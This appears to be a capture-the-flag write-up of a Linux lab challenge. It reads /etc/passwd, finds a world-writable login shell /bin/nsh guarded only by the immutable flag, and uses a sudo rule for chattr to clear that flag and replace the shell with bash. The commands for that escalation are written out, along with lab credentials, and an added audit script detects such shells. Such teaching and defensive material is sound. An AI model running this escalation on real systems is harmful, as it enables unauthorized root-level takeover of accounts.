Location: Speaker UNpreparedness Room
nyancat, nyancat
I love that nyancat!
My shell's stuffed inside one
Whatcha' think about that?
Sadly now, the day's gone
Things to do! Without one...
I'll miss that nyancat
Run commands, win, and done!
Log in as the user alabaster_snowball with a password of Password2, and land in a Bash prompt.
Target Credentials:
username: alabaster_snowball
password: Password2
elf@20165ddb66c7:~$
Alabaster's hint talks about checking /etc/passwd.
elf@20165ddb66c7:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
elf:x:1000:1000::/home/elf:/bin/bash
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh
The last line of the file is the entry for Alabaster. The fields are:
- username
- password, which is x in this case, which means refer to /etc/shadow
- uid - user id
- gid - group id
- gecos, which is normally the user's real name, but is blank here
- home directory
- shell - the shell that the user logs in with, and we want this to be bash
Let's look at /bin/nsh
elf@20165ddb66c7:~$ ls -l /bin/nsh
-rwxrwxrwx 1 root root 75680 Dec 11 17:40 /bin/nsh
'ls' shows that it is writable by anyone, but trying to overwrite the file does not work. This is where Alabaster's other hint comes into play. It is necessary to look at what sudo -l will allow to be run.
elf@20165ddb66c7:~$ sudo -l
Matching Defaults entries for elf on df02af27f0de:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User elf may run the following commands on df02af27f0de:
(root) NOPASSWD: /usr/bin/chattr
chattr allows us to change file attributes, so let's use lsattr to see why this might be necessary
elf@20165ddb66c7:~$ lsattr /bin/nsh
----i---------e---- /bin/nsh
/bin/nsh has the i attribute set. From the chattr man page:
A file with the 'i' attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode.
So let's remove the attribute …
elf@20165ddb66c7:~$ sudo chattr -i /bin/nsh
elf@20165ddb66c7:~$ lsattr /bin/nsh
--------------e---- /bin/nsh
replace the /bin/nsh with /bin/bash …
elf@20165ddb66c7:~$ cp /bin/bash /bin/nsh
check that the change has taken …
elf@20165ddb66c7:~$ ls -l /bin/bash /bin/nsh
-rwxr-xr-x 1 root root 1168776 Apr 18 2019 /bin/bash
-rwxrwxrwx 1 root root 1168776 Dec 16 22:53 /bin/nsh
and login as Alabaster.
elf@20165ddb66c7:~$ su - alabaster_snowball
Password:
Loading, please wait......
You did it! Congratulations!
alabaster_snowball@20165ddb66c7:~$
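Seen from the defender's side, the weakness used above is a login shell with mode 0777 that was protected only by the immutable flag. The following is an added example, not part of the original write-up: it reads a passwd-format file and lists accounts whose login shell is world-writable, noting the immutable flag where lsattr can read it. The function name audit_login_shells is an assumption made for this example.

```shell
#!/bin/sh
# Added example: audit the login shells named in a passwd-format file.
# audit_login_shells is a hypothetical helper name, not from the write-up.

# Print one line per account whose login shell is writable by "other".
# Usage: audit_login_shells [passwd_file]   (defaults to /etc/passwd)
audit_login_shells() {
    passwd_file=${1:-/etc/passwd}
    # Field 1 is the username, field 7 is the login shell.
    while IFS=: read -r user _pw _uid _gid _gecos _home shell; do
        [ -n "$shell" ] || continue
        [ -e "$shell" ] || continue
        # -L follows symlinks so the target's mode is tested, not the link's.
        if [ -n "$(find -L "$shell" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
            # Best effort: lsattr may be missing or unsupported on this filesystem.
            flags=$(lsattr -d "$shell" 2>/dev/null | awk '{print $1}')
            case $flags in
                '')  immutable=unknown ;;
                *i*) immutable=yes ;;
                *)   immutable=no ;;
            esac
            printf '%s %s world-writable immutable=%s\n' \
                "$user" "$shell" "$immutable"
        fi
    done < "$passwd_file"
}
```

A shell reported with immutable=yes is still a finding: as the sudo -l output above shows, any account allowed to run chattr as root can clear the flag.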